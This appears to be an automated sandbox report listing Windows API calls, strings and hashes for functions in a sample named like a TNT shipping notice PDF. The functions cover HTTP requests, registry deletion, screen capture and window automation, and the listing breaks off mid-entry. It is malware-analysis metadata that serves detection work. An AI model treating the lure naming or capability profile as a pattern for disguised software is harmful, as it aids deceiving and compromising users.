Opcode ID: 7d8d1dde6f5fd78c0d157f61309cf1e6bb7e493efac09c90ba36e8401998f3cf
Instruction ID: 566eb4bc4eb1096cd41fed81c175e190ccc8c97542c9cb1e26a8217b9beb3b45
Opcode Fuzzy Hash: 7d8d1dde6f5fd78c0d157f61309cf1e6bb7e493efac09c90ba36e8401998f3cf
Instruction Fuzzy Hash: D9614771108301AFD705EF65DC85EABBBF8FB89750F00092EF595921A1DB709A49CB52

Function 0093C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0093C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0093C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0093C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0093C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0093C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0093C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0093C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0093C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0093C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0093C5F0
InternetCloseHandle.WININET(00000000), ref: 0093C5FB

Strings

, xrefs: 0093C575

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 415b7ac4f6d07952cf1773df93436b06d887b51f849868311705395cc45f8427
Instruction ID: e2fab4ec5273790418d15b1d413f7ef7129074b398bf6f99981d3c34c88587ec
Opcode Fuzzy Hash: 415b7ac4f6d07952cf1773df93436b06d887b51f849868311705395cc45f8427
Instruction Fuzzy Hash: 965139F1504B09BFDB219F65C988AAB7BFCFB08755F004419F945A6610DB34E944EF60

Function 0095856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00958592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009585A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009585AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009585BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009585C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009585D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009585E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009585E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009585F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0095FC38,?), ref: 00958611
GlobalFree.KERNEL32(00000000), ref: 00958621
GetObjectW.GDI32(?,00000018,?), ref: 00958641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00958671
DeleteObject.GDI32(?), ref: 00958699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009586AF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: e924748ce5d6ce637b6e8f610cf06d9139f03d9dfca07406b4f99e9252b2f3e7
Instruction ID: c3ff5c2094867651ab4cf3e91be978409fa1df094a3acd082a14d8967cec2bd7
Opcode Fuzzy Hash: e924748ce5d6ce637b6e8f610cf06d9139f03d9dfca07406b4f99e9252b2f3e7
Instruction Fuzzy Hash: 344129B5605308AFDB11DFA6DC48EAB7BBCEF89716F104058F916E7260DB309945DB20

Function 009314BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00931502
VariantCopy.OLEAUT32(?,?), ref: 0093150B
VariantClear.OLEAUT32(?), ref: 00931517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009315FB
VarR8FromDec.OLEAUT32(?,?), ref: 00931657
VariantInit.OLEAUT32(?), ref: 00931708
SysFreeString.OLEAUT32(?), ref: 0093178C
VariantClear.OLEAUT32(?), ref: 009317D8
VariantClear.OLEAUT32(?), ref: 009317E7
VariantInit.OLEAUT32(00000000), ref: 00931823

Strings

Default, xrefs: 009316AF
%4d%02d%02d%02d%02d%02d, xrefs: 00931625

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 6ca59db85036a849e0f2b038bb03eb23fbe91cfa332eb425c214761a0de7db65
Instruction ID: d55a7cf5e78493791994bffa9438aedf4cecd49f28cdb577f1c985abe654d215
Opcode Fuzzy Hash: 6ca59db85036a849e0f2b038bb03eb23fbe91cfa332eb425c214761a0de7db65
Instruction Fuzzy Hash: B1D1FE71A00205EBDB009F69E885B79B7B9FF44700F14895AF446EB2A1DB34EC45DF62

Function 0094B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

Part of subcall function 0094C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0094B6AE,?,?), ref: 0094C9B5
Part of subcall function 0094C998: _wcslen.LIBCMT ref: 0094C9F1
Part of subcall function 0094C998: _wcslen.LIBCMT ref: 0094CA68
Part of subcall function 0094C998: _wcslen.LIBCMT ref: 0094CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0094B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0094B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0094B80A
RegCloseKey.ADVAPI32(?), ref: 0094B87E
RegCloseKey.ADVAPI32(?), ref: 0094B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0094B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0094B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0094B922
FreeLibrary.KERNEL32(00000000), ref: 0094B983
RegCloseKey.ADVAPI32(00000000), ref: 0094B994

Strings

RegDeleteKeyExW, xrefs: 0094B8FE
advapi32.dll, xrefs: 0094B8ED

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 499c18d41cab68aee7e1d9c819d9aebbe95fc4479327d82b9357d51db2a3895a
Instruction ID: 90378346c9d78fa33a4dff082a3e731d3fc7ac904974904238a6e5baf3086ca3
Opcode Fuzzy Hash: 499c18d41cab68aee7e1d9c819d9aebbe95fc4479327d82b9357d51db2a3895a
Instruction Fuzzy Hash: 02C16D70218201AFD714DF28C495F2ABBF5FF84318F14855CE49A8B7A2CB75E945CB92

Function 0094255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009425D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009425E8
CreateCompatibleDC.GDI32(?), ref: 009425F4
SelectObject.GDI32(00000000,?), ref: 00942601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0094266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009426AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009426D0
SelectObject.GDI32(?,?), ref: 009426D8
DeleteObject.GDI32(?), ref: 009426E1
DeleteDC.GDI32(?), ref: 009426E8
ReleaseDC.USER32(00000000,?), ref: 009426F3

Strings

(, xrefs: 0094268D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 8c8d83be995a64ccd22eedd9a908e2ced02ce715d5fabb33cac07ba6e116dbb0
Instruction ID: 064b31e3cf39398f689445fb5c6c4d646cd4e9700826bc8c215992e4c43df299
Opcode Fuzzy Hash: 8c8d83be995a64ccd22eedd9a908e2ced02ce715d5fabb33cac07ba6e116dbb0
Instruction Fuzzy Hash: 9D61E1B5D04219EFCF14CFA8D884EAEBBB5FF48310F20852AE956A7250D770A941DF50

Function 008FDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 008FDAA1

Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD659
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD66B
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD67D
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD68F
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD6A1
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD6B3
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD6C5
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD6D7
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD6E9
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD6FB
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD70D
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD71F
Part of subcall function 008FD63C: _free.LIBCMT ref: 008FD731

_free.LIBCMT ref: 008FDA96

Part of subcall function 008F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000), ref: 008F29DE
Part of subcall function 008F29C8: GetLastError.KERNEL32(00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000,00000000), ref: 008F29F0

_free.LIBCMT ref: 008FDAB8
_free.LIBCMT ref: 008FDACD
_free.LIBCMT ref: 008FDAD8
_free.LIBCMT ref: 008FDAFA
_free.LIBCMT ref: 008FDB0D
_free.LIBCMT ref: 008FDB1B
_free.LIBCMT ref: 008FDB26
_free.LIBCMT ref: 008FDB5E
_free.LIBCMT ref: 008FDB65
_free.LIBCMT ref: 008FDB82
_free.LIBCMT ref: 008FDB9A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b4323f411a0dfe001135902eb13ad428897174727a9411ce91406d8afe61fa3c
Instruction ID: 9a98fbc5011b227001c01eedcb533e63aa82462f7d66b6574515eed6200a09e1
Opcode Fuzzy Hash: b4323f411a0dfe001135902eb13ad428897174727a9411ce91406d8afe61fa3c
Instruction Fuzzy Hash: 48314A3264430E9FEB22AE39E845F7A7BEAFF00321F154519E749D7291DA71EC408725

Function 0092365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0092369C
_wcslen.LIBCMT ref: 009236A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00923797
GetClassNameW.USER32(?,?,00000400), ref: 0092380C
GetDlgCtrlID.USER32(?), ref: 0092385D
GetWindowRect.USER32(?,?), ref: 00923882
GetParent.USER32(?), ref: 009238A0
ScreenToClient.USER32(00000000), ref: 009238A7
GetClassNameW.USER32(?,?,00000100), ref: 00923921
GetWindowTextW.USER32(?,?,00000400), ref: 0092395D

Strings

%s%u, xrefs: 00923734

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: b83e6cb775e8af7fa8b1a0dde7abf610bc83ffd97a77abaa47c52cb35025935c
Instruction ID: e774e0585320b606c6b1548c6826e9ea7b68caf358f68b1916b33848acb4e4b3
Opcode Fuzzy Hash: b83e6cb775e8af7fa8b1a0dde7abf610bc83ffd97a77abaa47c52cb35025935c
Instruction Fuzzy Hash: E391D071204726EFD718DF24E885BAAB7ECFF45340F008629F999D2194DB34EA45CB91

Function 00924954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00924994
GetWindowTextW.USER32(?,?,00000400), ref: 009249DA
_wcslen.LIBCMT ref: 009249EB
CharUpperBuffW.USER32(?,00000000), ref: 009249F7
_wcsstr.LIBVCRUNTIME ref: 00924A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00924A64
GetWindowTextW.USER32(?,?,00000400), ref: 00924A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00924AE6
GetClassNameW.USER32(?,?,00000400), ref: 00924B20
GetWindowRect.USER32(?,?), ref: 00924B8B

Strings

ThumbnailClass, xrefs: 00924A6F, 00924AF1

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: b84358aee19c256699f9d6f275748d36fd4b963c3f1d3590f7dc05044cf349e8
Instruction ID: ace2d7ff18df857b799dd324be3d89ce4f858c2862e220326069e4a076ec22f0
Opcode Fuzzy Hash: b84358aee19c256699f9d6f275748d36fd4b963c3f1d3590f7dc05044cf349e8
Instruction Fuzzy Hash: 1C91CE710083269FDB04DF15E985BAA77ECFF84314F048469FD859A09ADB30ED45CBA2

Function 00958D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008D9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00958D5A
GetFocus.USER32 ref: 00958D6A
GetDlgCtrlID.USER32(00000000), ref: 00958D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00958E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00958ECF
GetMenuItemCount.USER32(?), ref: 00958EEC
GetMenuItemID.USER32(?,00000000), ref: 00958EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00958F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00958F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00958FA1

Strings

0, xrefs: 00958E9F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: e38aab9afbf74dbb42453fcdc94c3567bd7bdbf037ed7ab5933901e81873899e
Instruction ID: d3ac195c46d6c876a4f664d9152fa8ca717bfc4f36234758b41ddb162880fdd2
Opcode Fuzzy Hash: e38aab9afbf74dbb42453fcdc94c3567bd7bdbf037ed7ab5933901e81873899e
Instruction Fuzzy Hash: 4381AF71508301AFDB10DF16D885A6B7BF9FB88355F040919FD85A7291DB30D909DBA2

Function 0092DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0092DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0092DC46
_wcslen.LIBCMT ref: 0092DC50
_wcsstr.LIBVCRUNTIME ref: 0092DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0092DCBC

Strings

04090000, xrefs: 0092DCF2
DefaultLangCodepage, xrefs: 0092DD1F
\VarFileInfo\Translation, xrefs: 0092DCB4
%u.%u.%u.%u, xrefs: 0092DD9A
StringFileInfo\, xrefs: 0092DC8F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 945baaab924e18f42aced4964a119f99303733df0857a9ea5477853f69b6d65b
Instruction ID: 81f461746847d33d9dc2f213b1215b1abf95b07490289ba72792bdef6413a176
Opcode Fuzzy Hash: 945baaab924e18f42aced4964a119f99303733df0857a9ea5477853f69b6d65b
Instruction Fuzzy Hash: AA4105729407107ADB00E76AAC07EBF37ACEF46710F10016AFA05E61C2EB75D90097A6

Function 0094CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0094CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0094CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0094CD48

Part of subcall function 0094CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0094CCAA
Part of subcall function 0094CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0094CCBD
Part of subcall function 0094CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0094CCCF
Part of subcall function 0094CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0094CD05
Part of subcall function 0094CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0094CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0094CCF3

Strings

RegDeleteKeyExW, xrefs: 0094CCC9
advapi32.dll, xrefs: 0094CCB8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 998fecc8a1935117aedcb33613ae79ac4b61e0757e25fea2365de17f86314006
Instruction ID: 54d9f8aebb8371302fe1d2ebeeeb877f10ddbdd00283f5820ed6d5929057e19a
Opcode Fuzzy Hash: 998fecc8a1935117aedcb33613ae79ac4b61e0757e25fea2365de17f86314006
Instruction Fuzzy Hash: 693183B1D02219BFDB209B61DC88EFFBB7CEF45751F000565B905E2290DB349A45EBA0

Function 0092E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0092E6B4

Part of subcall function 008DE551: timeGetTime.WINMM(?,?,0092E6D4), ref: 008DE555

Sleep.KERNEL32(0000000A), ref: 0092E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0092E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0092E727
SetActiveWindow.USER32 ref: 0092E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0092E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0092E773
Sleep.KERNEL32(000000FA), ref: 0092E77E
IsWindow.USER32 ref: 0092E78A
EndDialog.USER32(00000000), ref: 0092E79B

Strings

BUTTON, xrefs: 0092E719

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 052205ed805a3c7f57785818473d49148363543733e9e264df877aa9f67aa8c5
Instruction ID: ab8dc4924574ed8859cc93a5de4087096389a0e3eec30a3511f25b89fa27324e
Opcode Fuzzy Hash: 052205ed805a3c7f57785818473d49148363543733e9e264df877aa9f67aa8c5
Instruction Fuzzy Hash: 372190B022D315BFEB105F69FCC9B2A3B6DF75474AF100427F506826A6DB71AC40AB24

Function 0092E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0092EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0092EA73
